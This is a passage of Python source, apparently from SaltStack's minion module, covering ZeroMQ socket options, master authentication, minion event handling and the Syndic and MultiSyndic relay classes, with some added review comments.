        ('TCP_KEEPALIVE', 'tcp_keepalive'),
        ('TCP_KEEPALIVE_IDLE', 'tcp_keepalive_idle'),
        ('TCP_KEEPALIVE_CNT', 'tcp_keepalive_cnt'),
        ('TCP_KEEPALIVE_INTVL', 'tcp_keepalive_intvl'),
    )
    for zmq_attr, opt_key in keepalive_options:
        self.socket.setsockopt(getattr(zmq, zmq_attr), self.opts[opt_key])
def _set_monitor_socket(self):
    # Attach a zmq monitor socket and a watcher thread that logs
    # connection-level events, but only when this zmq build supports
    # monitoring and the user enabled the 'zmq_monitor' option.
    if not HAS_ZMQ_MONITOR or not self.opts['zmq_monitor']:
        return
    self.monitor_socket = self.socket.get_monitor_socket()
    # NOTE(review): the thread is not daemonized; presumably it exits via
    # EVENT_MONITOR_STOPPED when the socket is closed -- confirm.
    t = threading.Thread(target=self._socket_monitor, args=(self.monitor_socket,))
    t.start()
def _socket_monitor(self, monitor):
    '''
    Consume zmq monitor messages from *monitor*, logging each one, until
    the monitor is stopped; then close the monitor socket.
    '''
    # Map numeric zmq event ids back to their symbolic EVENT_* names
    event_map = {
        getattr(zmq, attr): attr
        for attr in dir(zmq)
        if attr.startswith('EVENT_')
    }
    while monitor.poll():
        evt = zmq.utils.monitor.recv_monitor_message(monitor)
        evt.update({'description': event_map[evt['event']]})
        log.debug("ZeroMQ event: {0}".format(evt))
        if evt['event'] == zmq.EVENT_MONITOR_STOPPED:
            break
    monitor.close()
    log.trace("event monitor thread done!")
def _set_reconnect_ivl(self):
    # Base zmq reconnect interval (milliseconds). When recon_randomize is
    # set, pick a random delay in [recon_default, recon_default+recon_max]
    # so a fleet of minions does not reconnect in lock-step.
    recon_delay = self.opts['recon_default']
    if self.opts['recon_randomize']:
        recon_delay = randint(self.opts['recon_default'],
                              self.opts['recon_default'] + self.opts['recon_max']
                              )
        log.debug("Generated random reconnect delay between '{0}ms' and '{1}ms' ({2})".format(
            self.opts['recon_default'],
            self.opts['recon_default'] + self.opts['recon_max'],
            recon_delay)
        )
    log.debug("Setting zmq_reconnect_ivl to '{0}ms'".format(recon_delay))
    self.socket.setsockopt(zmq.RECONNECT_IVL, recon_delay)
def _set_reconnect_ivl_max(self):
    '''
    Cap zmq's reconnect back-off at recon_max milliseconds, when the zmq
    build exposes RECONNECT_IVL_MAX.
    '''
    if hasattr(zmq, 'RECONNECT_IVL_MAX'):
        # Fix: log the value actually passed to zmq. The old message
        # reported recon_default + recon_max while only recon_max was set.
        log.debug("Setting zmq_reconnect_ivl_max to '{0}ms'".format(
            self.opts['recon_max'])
        )
        self.socket.setsockopt(
            zmq.RECONNECT_IVL_MAX, self.opts['recon_max']
        )
def _set_ipv4only(self):
    # Despite the method name, this *clears* the IPV4ONLY flag when ipv6
    # is enabled, so the socket accepts both address families.
    if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
        # IPv6 sockets work for both IPv6 and IPv4 addresses
        self.socket.setsockopt(zmq.IPV4ONLY, 0)
def _fire_master_minion_start(self):
    '''
    Notify the master that this minion is up, once on the legacy
    'minion_start' tag and once on the namespaced minion/<id>/start tag.
    '''
    for start_tag in ('minion_start',
                      tagify([self.opts['id'], 'start'], 'minion')):
        # asctime() is evaluated per event, mirroring the two original
        # independent calls
        self._fire_master(
            'Minion {0} started at {1}'.format(
                self.opts['id'],
                time.asctime()
            ),
            start_tag,
        )
def _setsockopts(self):
    '''
    Apply subscription filters, identity, and the standard option set to
    the master PUB socket.
    '''
    if self.opts['zmq_filtering']:
        # TODO: constants file for "broadcast"
        subscriptions = ['broadcast', self.hexid]
    else:
        # Empty topic == subscribe to everything
        subscriptions = ['']
    for topic in subscriptions:
        self.socket.setsockopt(zmq.SUBSCRIBE, topic)
    self.socket.setsockopt(zmq.IDENTITY, self.opts['id'])
    self._set_ipv4only()
    self._set_reconnect_ivl_max()
    self._set_tcp_keepalive()
@property
def master_pub(self):
    '''
    The zmq URL (tcp://ip:port) of the master publish socket.
    '''
    master_ip = self.opts['master_ip']
    return 'tcp://{ip}:{port}'.format(ip=master_ip, port=self.publish_port)
def authenticate(self, timeout=60, safe=True):
    '''
    Authenticate with the master, this method breaks the functional
    paradigm, it will update the master information from a fresh sign
    in, signing in can occur as often as needed to keep up with the
    revolving master AES key.

    :param timeout: seconds passed through to SAuth.authenticate
    :param safe: passed through to SAuth.authenticate
    '''
    log.debug(
        'Attempting to authenticate with the Salt Master at {0}'.format(
            self.opts['master_ip']
        )
    )
    auth = salt.crypt.SAuth(self.opts)
    auth.authenticate(timeout=timeout, safe=safe)
    # TODO: remove these and just use a local reference to auth??
    self.tok = auth.gen_token('salt')
    self.crypticle = auth.crypticle
    # A syndic may override the publish port it dials back to
    if self.opts.get('syndic_master_publish_port'):
        self.publish_port = self.opts.get('syndic_master_publish_port')
    else:
        self.publish_port = auth.creds['publish_port']
def module_refresh(self, force_refresh=False, notify=False):
    '''
    Refresh the functions and returners.
    '''
    log.debug('Refreshing modules. Notify={0}'.format(notify))
    funcs, returners, _ = self._load_modules(force_refresh, notify=notify)
    self.functions = funcs
    self.returners = returners
    # Keep the scheduler pointed at the freshly loaded tables
    self.schedule.functions = funcs
    self.schedule.returners = returners
def pillar_refresh(self, force_refresh=False):
    '''
    Refresh the pillar

    :param force_refresh: forwarded to module_refresh after the pillar
        has been (re)compiled
    '''
    log.debug('Refreshing pillar')
    try:
        self.opts['pillar'] = salt.pillar.get_pillar(
            self.opts,
            self.opts['grains'],
            self.opts['id'],
            self.opts['environment'],
        ).compile_pillar()
    except SaltClientError:
        # Do not exit if a pillar refresh fails.
        log.error('Pillar data could not be refreshed. '
                  'One or more masters may be down!')
    # Always reload modules afterwards, even if the pillar compile failed
    self.module_refresh(force_refresh)
def manage_schedule(self, package):
    '''
    Refresh the functions and returners.
    '''
    tag, data = salt.utils.event.MinionEvent.unpack(package)
    func = data.get('func', None)
    name = data.get('name', None)
    schedule = data.get('schedule', None)
    where = data.get('where', None)
    # Dispatch table instead of an if/elif ladder; unknown funcs are a
    # no-op, matching the original behavior.
    actions = {
        'delete': lambda: self.schedule.delete_job(name),
        'add': lambda: self.schedule.add_job(schedule),
        'modify': lambda: self.schedule.modify_job(name, schedule, where),
        'enable': lambda: self.schedule.enable_schedule(),
        'disable': lambda: self.schedule.disable_schedule(),
        'enable_job': lambda: self.schedule.enable_job(name, where),
        'run_job': lambda: self.schedule.run_job(name, where),
        'disable_job': lambda: self.schedule.disable_job(name, where),
        'reload': lambda: self.schedule.reload(schedule),
    }
    handler = actions.get(func)
    if handler is not None:
        handler()
def environ_setenv(self, package):
    '''
    Set the salt-minion main process environment according to
    the data contained in the minion event data
    '''
    tag, data = salt.utils.event.MinionEvent.unpack(package)
    environ = data.get('environ', None)
    if environ is None:
        return False
    # Local import kept from the original to avoid a module-load cycle
    import salt.modules.environ as mod_environ
    return mod_environ.setenv(
        environ,
        data.get('false_unsets', False),
        data.get('clear_all', False),
    )
def clean_die(self, signum, frame):
    '''
    Python does not handle the SIGTERM cleanly, if it is signaled exit
    the minion process cleanly

    :param signum: signal number delivered (unused)
    :param frame: current stack frame (unused)
    '''
    # Stop the tune_in loop, then terminate. NOTE(review): this uses the
    # site builtin exit(); sys.exit() would be the conventional choice.
    self._running = False
    exit(0)
def _pre_tune(self):
    '''
    Set the minion running flag and issue the appropriate warnings if
    the minion cannot be started or is already running
    '''
    # _running is a tri-state flag compared by identity:
    #   None  -> never started, flip to True and continue
    #   False -> a stop was requested, refuse to start
    #   True  -> already running, refuse to start twice
    if self._running is None:
        self._running = True
    elif self._running is False:
        log.error(
            'This {0} was scheduled to stop. Not running '
            '{0}.tune_in()'.format(self.__class__.__name__)
        )
        return
    elif self._running is True:
        log.error(
            'This {0} is already running. Not running '
            '{0}.tune_in()'.format(self.__class__.__name__)
        )
        return

    try:
        log.info(
            '{0} is starting as user \'{1}\''.format(
                self.__class__.__name__,
                salt.utils.get_user()
            )
        )
    except Exception as err:
        # Only windows is allowed to fail here. See #3189. Log as debug in
        # that case. Else, error.
        # (the and/or chain picks DEBUG on Windows, ERROR elsewhere)
        log.log(
            salt.utils.is_windows() and logging.DEBUG or logging.ERROR,
            'Failed to get the user who is starting {0}'.format(
                self.__class__.__name__
            ),
            exc_info=err
        )
def _mine_send(self, package):
    '''
    Send mine data to the master
    '''
    # Unpack the event payload (index 1 is the load dict), attach our
    # auth token, and forward it over a fresh master channel.
    load = salt.utils.event.SaltEvent.unpack(package)[1]
    load['tok'] = self.tok
    channel = salt.transport.Channel.factory(self.opts)
    return channel.send(load)
def handle_event(self, package):
    '''
    Handle an event from the epull_sock (all local minion events)

    Dispatches on the event tag prefix: refresh requests, schedule
    management, mine forwarding, master fire-through, and the
    master-connection state machine (__master_disconnected /
    __master_connected).
    '''
    log.debug('Handling event {0!r}'.format(package))
    if package.startswith('module_refresh'):
        tag, data = salt.utils.event.MinionEvent.unpack(package)
        self.module_refresh(notify=data.get('notify', False))
    elif package.startswith('pillar_refresh'):
        self.pillar_refresh()
    elif package.startswith('manage_schedule'):
        self.manage_schedule(package)
    elif package.startswith('grains_refresh'):
        # Only refresh pillar if the grains actually changed
        if self.grains_cache != self.opts['grains']:
            self.pillar_refresh(force_refresh=True)
            self.grains_cache = self.opts['grains']
    elif package.startswith('environ_setenv'):
        self.environ_setenv(package)
    elif package.startswith('_minion_mine'):
        self._mine_send(package)
    elif package.startswith('fire_master'):
        tag, data = salt.utils.event.MinionEvent.unpack(package)
        log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
        self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
    elif package.startswith('__master_disconnected'):
        tag, data = salt.utils.event.MinionEvent.unpack(package)
        # if the master disconnect event is for a different master, raise an exception
        if data['master'] != self.opts['master']:
            raise Exception()
        if self.connected:
            # we are not connected anymore
            self.connected = False
            # modify the scheduled job to fire only on reconnect
            schedule = {
                'function': 'status.master',
                'seconds': self.opts['master_alive_interval'],
                'jid_include': True,
                'maxrunning': 2,
                'kwargs': {'master': self.opts['master'],
                           'connected': False}
            }
            self.schedule.modify_job(name='__master_alive',
                                     schedule=schedule)
            log.info('Connection to master {0} lost'.format(self.opts['master']))
            if self.opts['master_type'] == 'failover':
                log.info('Trying to tune in to next master from master-list')
                # if eval_master finds a new master for us, self.connected
                # will be True again on successfull master authentication
                self.opts['master'] = self.eval_master(opts=self.opts,
                                                       failed=True)
                if self.connected:
                    # re-init the subsystems to work with the new master
                    log.info('Re-initialising subsystems for new '
                             'master {0}'.format(self.opts['master']))
                    # Tear down the old zmq plumbing and rebuild it against
                    # the new master's publish socket
                    del self.socket
                    del self.context
                    del self.poller
                    self._init_context_and_poller()
                    self.socket = self.context.socket(zmq.SUB)
                    self._set_reconnect_ivl()
                    self._setsockopts()
                    self.socket.connect(self.master_pub)
                    self.poller.register(self.socket, zmq.POLLIN)
                    self.poller.register(self.epull_sock, zmq.POLLIN)
                    self._fire_master_minion_start()
                    log.info('Minion is ready to receive requests!')
                    # update scheduled job to run with the new master addr
                    schedule = {
                        'function': 'status.master',
                        'seconds': self.opts['master_alive_interval'],
                        'jid_include': True,
                        'maxrunning': 2,
                        'kwargs': {'master': self.opts['master'],
                                   'connected': True}
                    }
                    self.schedule.modify_job(name='__master_alive',
                                             schedule=schedule)
    elif package.startswith('__master_connected'):
        # handle this event only once. otherwise it will pollute the log
        if not self.connected:
            log.info('Connection to master {0} re-established'.format(self.opts['master']))
            self.connected = True
            # modify the __master_alive job to only fire,
            # if the connection is lost again
            schedule = {
                'function': 'status.master',
                'seconds': self.opts['master_alive_interval'],
                'jid_include': True,
                'maxrunning': 2,
                'kwargs': {'master': self.opts['master'],
                           'connected': True}
            }
            self.schedule.modify_job(name='__master_alive',
                                     schedule=schedule)
    elif package.startswith('_salt_error'):
        tag, data = salt.utils.event.MinionEvent.unpack(package)
        log.debug('Forwarding salt error event tag={tag}'.format(tag=tag))
        self._fire_master(data, tag)
def _windows_thread_cleanup(self):
    '''
    Cleanup Windows threads

    Joins and drops finished job threads tracked in self.win_proc.
    No-op on non-Windows platforms.
    '''
    if not salt.utils.is_windows():
        return
    # Fix: iterate over a snapshot. Removing from the list while
    # iterating it silently skips the element after each removal.
    for thread in list(self.win_proc):
        if not thread.is_alive():
            thread.join()
            try:
                self.win_proc.remove(thread)
                del thread
            except (ValueError, NameError):
                pass
# Main Minion Tune In
def tune_in(self):
    '''
    Lock onto the publisher. This is the main event loop for the minion
    :rtype : None
    '''
    self._pre_tune()
    # Properly exit if a SIGTERM is signalled
    signal.signal(signal.SIGTERM, self.clean_die)
    log.debug('Minion {0!r} trying to tune in'.format(self.opts['id']))
    # Build the local event bus, then the SUB socket to the master PUB
    self._prepare_minion_event_system()
    self.socket = self.context.socket(zmq.SUB)
    self._set_reconnect_ivl()
    self._setsockopts()
    self._set_monitor_socket()
    self.socket.connect(self.master_pub)
    self.poller.register(self.socket, zmq.POLLIN)
    self.poller.register(self.epull_sock, zmq.POLLIN)
    self._fire_master_minion_start()
    log.info('Minion is ready to receive requests!')
    # Make sure to gracefully handle SIGUSR1
    enable_sigusr1_handler()
    # Make sure to gracefully handle CTRL_LOGOFF_EVENT
    salt.utils.enable_ctrl_logoff_handler()
    # On first startup execute a state run if configured to do so
    self._state_run()
    loop_interval = int(self.opts['loop_interval'])
    try:
        if self.opts['grains_refresh_every']:  # If exists and is not zero. In minutes, not seconds!
            if self.opts['grains_refresh_every'] > 1:
                log.debug(
                    'Enabling the grains refresher. Will run every {0} minutes.'.format(
                        self.opts['grains_refresh_every'])
                )
            else:  # Clean up minute vs. minutes in log message
                log.debug(
                    'Enabling the grains refresher. Will run every {0} minute.'.format(
                        self.opts['grains_refresh_every'])
                )
            self._refresh_grains_watcher(
                abs(self.opts['grains_refresh_every'])
            )
    except Exception as exc:
        log.error(
            'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
                exc)
        )
    # Optional periodic ping so the master sees an idle minion as alive
    ping_interval = self.opts.get('ping_interval', 0) * 60
    ping_at = None
    while self._running is True:
        loop_interval = self.process_schedule(self, loop_interval)
        self._windows_thread_cleanup()
        try:
            socks = self._do_poll(loop_interval)
            if ping_interval > 0:
                # Any traffic (or first pass) pushes the next ping out
                if socks or not ping_at:
                    ping_at = time.time() + ping_interval
                if ping_at < time.time():
                    log.debug('Ping master')
                    self._fire_master('ping', 'minion_ping')
                    ping_at = time.time() + ping_interval
            self._do_socket_recv(socks)
            self._do_event_poll(socks)
            self._process_beacons()
        except zmq.ZMQError as exc:
            # The interrupt caused by python handling the
            # SIGCHLD. Throws this error with errno == EINTR.
            # Nothing to receive on the zmq socket throws this error
            # with EAGAIN.
            # Both are safe to ignore
            if exc.errno != errno.EAGAIN and exc.errno != errno.EINTR:
                log.critical('Unexpected ZMQError while polling minion',
                             exc_info=True)
            continue
        except SaltClientError:
            raise
        except Exception:
            log.critical(
                'An exception occurred while polling the minion',
                exc_info=True
            )
def tune_in_no_block(self):
    '''
    Executes the tune_in sequence but omits extra logging and the
    management of the event bus assuming that these are handled outside
    the tune_in sequence

    NOTE: this is a generator; it yields True after a recoverable error
    so an external driver can interleave other work.
    '''
    self._pre_tune()
    self._init_context_and_poller()
    self.socket = self.context.socket(zmq.SUB)
    self._setsockopts()
    self.socket.connect(self.master_pub)
    self.poller.register(self.socket, zmq.POLLIN)
    self._fire_master_minion_start()
    loop_interval = int(self.opts['loop_interval'])
    # On first startup execute a state run if configured to do so
    self._state_run()
    while self._running is True:
        try:
            socks = self._do_poll(loop_interval)
            self._do_socket_recv(socks)
            # Check the event system
        except zmq.ZMQError:
            # If a zeromq error happens recover
            yield True
        except Exception:
            log.critical(
                'An exception occurred while polling the minion',
                exc_info=True
            )
            yield True
def _do_poll(self, loop_interval):
    '''
    Poll every registered socket for up to loop_interval seconds and
    return the resulting {socket: event-mask} dict.
    '''
    log.trace('Check main poller timeout {0}'.format(loop_interval))
    timeout_ms = loop_interval * 1000
    return dict(self.poller.poll(timeout_ms))
def _do_event_poll(self, socks):
    # Check the event system
    # Drain one local event, handle it, and republish it on the local
    # event bus. Handler errors are logged but never break the main loop.
    if socks.get(self.epull_sock) == zmq.POLLIN:
        package = self.epull_sock.recv(zmq.NOBLOCK)
        try:
            self.handle_event(package)
            self.epub_sock.send(package)
        except Exception:
            log.debug('Exception while handling events', exc_info=True)
        # Add an extra fallback in case a forked process leaks through
        multiprocessing.active_children()
def _do_socket_recv(self, socks):
    '''
    Pull one published job message off the master PUB socket (if the
    poll reported it readable) and hand the deserialized payload to
    _handle_payload.
    '''
    if socks.get(self.socket) == zmq.POLLIN:
        # topic filtering is done at the zmq level, so we just strip it
        messages = self.socket.recv_multipart(zmq.NOBLOCK)
        messages_len = len(messages)
        # if it was one message, then its old style
        if messages_len == 1:
            payload = self.serial.loads(messages[0])
        # 2 includes a header which says who should do it
        elif messages_len == 2:
            payload = self.serial.loads(messages[1])
        else:
            # Fix: was format(len(messages_len)) -- len() of an int raises
            # TypeError and masked the intended error message.
            raise Exception(('Invalid number of messages ({0}) in zeromq pub'
                             'message from master').format(messages_len))
        log.trace('Handling payload')
        self._handle_payload(payload)
def destroy(self):
    '''
    Tear down the minion

    Stops the main loop, closes and unregisters every pollable socket,
    then closes the event pub/pull sockets, the master SUB socket and
    finally terminates the zmq context.
    '''
    self._running = False
    if getattr(self, 'poller', None) is not None:
        # poller.sockets is a dict in newer pyzmq, a list of
        # (socket, flags) tuples in older releases
        if isinstance(self.poller.sockets, dict):
            # NOTE(review): unregister() mutates poller.sockets while we
            # iterate its keys -- presumably safe on the pyzmq versions
            # targeted here, but worth confirming.
            for socket in six.iterkeys(self.poller.sockets):
                if socket.closed is False:
                    socket.close()
                self.poller.unregister(socket)
        else:
            for socket in self.poller.sockets:
                if socket[0].closed is False:
                    socket[0].close()
                self.poller.unregister(socket[0])
    if hasattr(self, 'epub_sock') and self.epub_sock.closed is False:
        self.epub_sock.close()
    if hasattr(self, 'epull_sock') and self.epull_sock.closed is False:
        self.epull_sock.close()
    if hasattr(self, 'socket') and self.socket.closed is False:
        self.socket.close()
    if hasattr(self, 'context') and self.context.closed is False:
        self.context.term()
def __del__(self):
    # Best-effort cleanup of zmq sockets and context at garbage collection
    self.destroy()
class Syndic(Minion):
    '''
    Make a Syndic minion, this minion will use the minion keys on the
    master to authenticate with a higher level master.
    '''
    def __init__(self, opts, **kwargs):
        # interface of the local (lower) master this syndic fronts for
        self._syndic_interface = opts.get('interface')
        self._syndic = True
        # force auth_safemode True because Syndic don't support autorestart
        opts['auth_safemode'] = True
        opts['loop_interval'] = 1
        super(Syndic, self).__init__(opts, **kwargs)
        self.mminion = salt.minion.MasterMinion(opts)
        # jids whose job load has already been forwarded upstream
        self.jid_forward_cache = set()

    def _handle_aes(self, load, sig=None):
        '''
        Takes the AES encrypted load, decrypts it, and runs the encapsulated
        instructions
        '''
        # If the AES authentication has changed, re-authenticate
        try:
            data = self.crypticle.loads(load)
        except AuthenticationError:
            self.authenticate()
            data = self.crypticle.loads(load)
        # Verify that the publication is valid
        if 'tgt' not in data or 'jid' not in data or 'fun' not in data \
                or 'arg' not in data:
            return
        # decrement the hop counter so the job eventually stops cascading
        data['to'] = int(data.get('to', self.opts['timeout'])) - 1
        if 'user' in data:
            log.debug(
                'User {0[user]} Executing syndic command {0[fun]} with '  # pylint: disable=W1307
                'jid {0[jid]}'.format(
                    data
                )
            )
        else:
            log.debug(
                'Executing syndic command {0[fun]} with jid {0[jid]}'.format(  # pylint: disable=W1307
                    data
                )
            )
        log.debug('Command details: {0}'.format(data))
        self._handle_decoded_payload(data)

    def _handle_decoded_payload(self, data):
        '''
        Override this method if you wish to handle the decoded data
        differently.
        '''
        # Only forward the command if it didn't originate from ourselves
        if data.get('master_id', 0) != self.opts.get('master_id', 1):
            self.syndic_cmd(data)

    def syndic_cmd(self, data):
        '''
        Take the now clear load and forward it on to the client cmd
        '''
        # Set up default tgt_type
        if 'tgt_type' not in data:
            data['tgt_type'] = 'glob'
        kwargs = {}
        # optionally add a few fields to the publish data
        for field in ('master_id',  # which master the job came from
                      'user',  # which user ran the job
                      ):
            if field in data:
                kwargs[field] = data[field]
        try:
            # Send out the publication
            self.local.pub(data['tgt'],
                           data['fun'],
                           data['arg'],
                           data['tgt_type'],
                           data['ret'],
                           data['jid'],
                           data['to'],
                           **kwargs)
        except Exception as exc:
            # best-effort: a failed downstream publish must not kill the loop
            log.warning('Unable to forward pub data: {0}'.format(exc))

    def _setsockopts(self):
        # no filters for syndication masters, unless we want to maintain a
        # list of all connected minions and update the filter
        self.socket.setsockopt(zmq.SUBSCRIBE, '')
        self.socket.setsockopt(zmq.IDENTITY, self.opts['id'])
        self._set_reconnect_ivl_max()
        self._set_tcp_keepalive()
        self._set_ipv4only()

    def _fire_master_syndic_start(self):
        # Send an event to the master that the minion is live
        # (legacy tag plus the namespaced syndic/<id>/start tag)
        self._fire_master(
            'Syndic {0} started at {1}'.format(
                self.opts['id'],
                time.asctime()
            ),
            'syndic_start'
        )
        self._fire_master(
            'Syndic {0} started at {1}'.format(
                self.opts['id'],
                time.asctime()
            ),
            tagify([self.opts['id'], 'start'], 'syndic'),
        )

    def tune_in_no_block(self):
        '''
        Executes the tune_in sequence but omits extra logging and the
        management of the event bus assuming that these are handled outside
        the tune_in sequence

        NOTE: this is a generator; it yields True after each recoverable
        error so a MultiSyndic driver can interleave other masters.
        '''
        # Instantiate the local client
        self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
        self.local.event.subscribe('')
        self._init_context_and_poller()
        self.socket = self.context.socket(zmq.SUB)
        self._setsockopts()
        self.socket.connect(self.master_pub)
        self.poller.register(self.socket, zmq.POLLIN)
        loop_interval = int(self.opts['loop_interval'])
        self._fire_master_syndic_start()
        while True:
            try:
                socks = dict(self.poller.poll(loop_interval * 1000))
                if socks.get(self.socket) == zmq.POLLIN:
                    self._process_cmd_socket()
            except zmq.ZMQError:
                yield True
            except Exception:
                log.critical(
                    'An exception occurred while polling the minion',
                    exc_info=True
                )
                yield True

    # Syndic Tune In
    def tune_in(self):
        '''
        Lock onto the publisher. This is the main event loop for the syndic
        '''
        signal.signal(signal.SIGTERM, self.clean_die)
        log.debug('Syndic {0!r} trying to tune in'.format(self.opts['id']))
        self._init_context_and_poller()
        # Instantiate the local client
        self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
        self.local.event.subscribe('')
        self.local.opts['interface'] = self._syndic_interface
        # register the event sub to the poller
        self.poller.register(self.local.event.sub)
        # Start with the publish socket
        # Share the poller with the event object
        self.socket = self.context.socket(zmq.SUB)
        self._setsockopts()
        self.socket.connect(self.master_pub)
        self.poller.register(self.socket, zmq.POLLIN)
        # Send an event to the master that the minion is live
        self._fire_master_syndic_start()
        # Make sure to gracefully handle SIGUSR1
        enable_sigusr1_handler()
        loop_interval = int(self.opts['loop_interval'])
        self._reset_event_aggregation()
        while True:
            try:
                # Do all the maths in seconds
                timeout = loop_interval
                if self.event_forward_timeout is not None:
                    # wake up no later than the pending flush deadline
                    timeout = min(timeout,
                                  self.event_forward_timeout - time.time())
                if timeout >= 0:
                    log.trace('Polling timeout: %f', timeout)
                    socks = dict(self.poller.poll(timeout * 1000))
                else:
                    # This shouldn't really happen.
                    # But there's no harm being defensive
                    log.warning('Negative timeout in syndic main loop')
                    socks = {}
                if socks.get(self.socket) == zmq.POLLIN:
                    self._process_cmd_socket()
                if socks.get(self.local.event.sub) == zmq.POLLIN:
                    self._process_event_socket()
                if self.event_forward_timeout is not None and \
                        self.event_forward_timeout < time.time():
                    self._forward_events()
            # We don't handle ZMQErrors like the other minions
            # I've put explicit handling around the receive calls
            # in the process_*_socket methods. If we see any other
            # errors they may need some kind of handling so log them
            # for now.
            except Exception:
                log.critical(
                    'An exception occurred while polling the syndic',
                    exc_info=True
                )

    def _process_cmd_socket(self):
        try:
            messages = self.socket.recv_multipart(zmq.NOBLOCK)
            messages_len = len(messages)
            idx = None
            if messages_len == 1:
                idx = 0
            elif messages_len == 2:
                idx = 1
            else:
                raise SaltSyndicMasterError('Syndication master received message of invalid len ({0}/2)'.format(messages_len))
            payload = self.serial.loads(messages[idx])
        except zmq.ZMQError as e:
            # Swallow errors for bad wakeups or signals needing processing
            if e.errno != errno.EAGAIN and e.errno != errno.EINTR:
                raise
        # NOTE(review): if the ZMQError above is swallowed, 'payload' is
        # never bound and the next line raises NameError -- confirm this
        # path cannot be hit (the caller only invokes us after POLLIN).
        log.trace('Handling payload')
        self._handle_payload(payload)

    def _reset_event_aggregation(self):
        # Drop buffered job returns and raw events; clear the flush deadline
        self.jids = {}
        self.raw_events = []
        self.event_forward_timeout = None

    def _process_event_socket(self):
        # Drain local events for at most syndic_max_event_process_time
        # seconds, aggregating job returns into self.jids and everything
        # else into self.raw_events for the next _forward_events flush.
        tout = time.time() + self.opts['syndic_max_event_process_time']
        while tout > time.time():
            try:
                event = self.local.event.get_event_noblock()
            except zmq.ZMQError as e:
                # EAGAIN indicates no more events at the moment
                # EINTR some kind of signal maybe someone trying
                # to get us to quit so escape our timeout
                if e.errno == errno.EAGAIN or e.errno == errno.EINTR:
                    break
                raise
            log.trace('Got event {0}'.format(event['tag']))
            if self.event_forward_timeout is None:
                # first buffered event starts the flush countdown
                self.event_forward_timeout = (
                    time.time() + self.opts['syndic_event_forward_timeout']
                )
            tag_parts = event['tag'].split('/')
            if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
                    salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
                    'return' in event['data']:
                if 'jid' not in event['data']:
                    # Not a job return
                    continue
                jdict = self.jids.setdefault(event['tag'], {})
                if not jdict:
                    jdict['__fun__'] = event['data'].get('fun')
                    jdict['__jid__'] = event['data']['jid']
                    jdict['__load__'] = {}
                    fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
                    # Only need to forward each load once. Don't hit the disk
                    # for every minion return!
                    if event['data']['jid'] not in self.jid_forward_cache:
                        jdict['__load__'].update(
                            self.mminion.returners[fstr](event['data']['jid'])
                        )
                        self.jid_forward_cache.add(event['data']['jid'])
                        if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
                            # Pop the oldest jid from the cache
                            tmp = sorted(list(self.jid_forward_cache))
                            tmp.pop(0)
                            self.jid_forward_cache = set(tmp)
                if 'master_id' in event['data']:
                    # __'s to make sure it doesn't print out on the master cli
                    jdict['__master_id__'] = event['data']['master_id']
                jdict[event['data']['id']] = event['data']['return']
            else:
                # Add generic event aggregation here
                if 'retcode' not in event['data']:
                    self.raw_events.append(event)

    def _forward_events(self):
        # Flush everything buffered by _process_event_socket upstream,
        # then reset the aggregation state.
        log.trace('Forwarding events')
        if self.raw_events:
            self._fire_master(events=self.raw_events,
                              pretag=tagify(self.opts['id'], base='syndic'),
                              )
        for jid in self.jids:
            self._return_pub(self.jids[jid], '_syndic_return')
        self._reset_event_aggregation()

    def destroy(self):
        '''
        Tear down the syndic minion
        '''
        # We borrowed the local clients poller so give it back before
        # it's destroyed. Reset the local poller reference.
        self.poller = None
        super(Syndic, self).destroy()
        if hasattr(self, 'local'):
            del self.local
class MultiSyndic(MinionBase):
'''
Make a MultiSyndic minion, this minion will handle relaying jobs and returns from
all minions connected to it to the list of masters it is connected to.
Modes (controlled by `syndic_mode`:
sync: This mode will synchronize all events and publishes from higher level masters
cluster: This mode will only sync job publishes and returns
Note: jobs will be returned best-effort to the requesting master. This also means
(since we are using zmq) that if a job was fired and the master disconnects
between the publish and return, that the return will end up in a zmq buffer
in this Syndic headed to that original master.
In addition, since these classes all seem to use a mix of blocking and non-blocking
calls (with varying timeouts along the way) this daemon does not handle failure well,
it will (under most circumstances) stall the daemon for ~15s trying to forward events
to the down master
'''
# time to connect to upstream master
SYNDIC_CONNECT_TIMEOUT = 5
SYNDIC_EVENT_TIMEOUT = 5
def __init__(self, opts):
    # Build one (threaded) Syndic connection attempt per configured
    # master and block until at least one of them signs in.
    opts['loop_interval'] = 1
    super(MultiSyndic, self).__init__(opts)
    self.mminion = salt.minion.MasterMinion(opts)
    # sync (old behavior), cluster (only returns and publishes)
    self.syndic_mode = self.opts.get('syndic_mode', 'sync')
    # set by any _connect_to_master_thread once it connects
    self._has_master = threading.Event()
    self.jid_forward_cache = set()
    # create all of the syndics you need
    self.master_syndics = {}
    for master in set(self.opts['master']):
        self._init_master_conn(master)
    log.info('Syndic waiting on any master to connect...')
    # threading events are un-interruptible in python 2 :/
    # (poll in 1s slices so signals still get a chance to fire)
    while not self._has_master.is_set():
        self._has_master.wait(1)
def _init_master_conn(self, master):
    '''
    Start a thread to connect to the master `master`
    '''
    # if we are re-creating one, lets make sure its not still in use
    if master in self.master_syndics:
        if 'sign_in_thread' in self.master_syndics[master]:
            # join(0) is a non-blocking liveness probe
            self.master_syndics[master]['sign_in_thread'].join(0)
            if self.master_syndics[master]['sign_in_thread'].is_alive():
                return
    # otherwise we make one!
    # each syndic gets its own opts copy pointed at a single master
    s_opts = copy.copy(self.opts)
    s_opts['master'] = master
    t = threading.Thread(target=self._connect_to_master_thread, args=(master,))
    t.daemon = True
    self.master_syndics[master] = {'opts': s_opts,
                                   'auth_wait': s_opts['acceptance_wait_time'],
                                   'dead_until': 0,
                                   'sign_in_thread': t,
                                   }
    t.start()
def _connect_to_master_thread(self, master):
    '''
    Thread target to connect to a master

    Retries (with the per-master dead_until back-off) until the
    connection succeeds, then flags the shared _has_master event.
    '''
    connected = False
    master_dict = self.master_syndics[master]
    while connected is False:
        # if we marked it as dead, wait a while. The original code had
        # this check copy-pasted twice; a while-loop keeps the re-check
        # semantics (in case dead_until moved during the sleep) without
        # the duplication.
        while master_dict['dead_until'] > time.time():
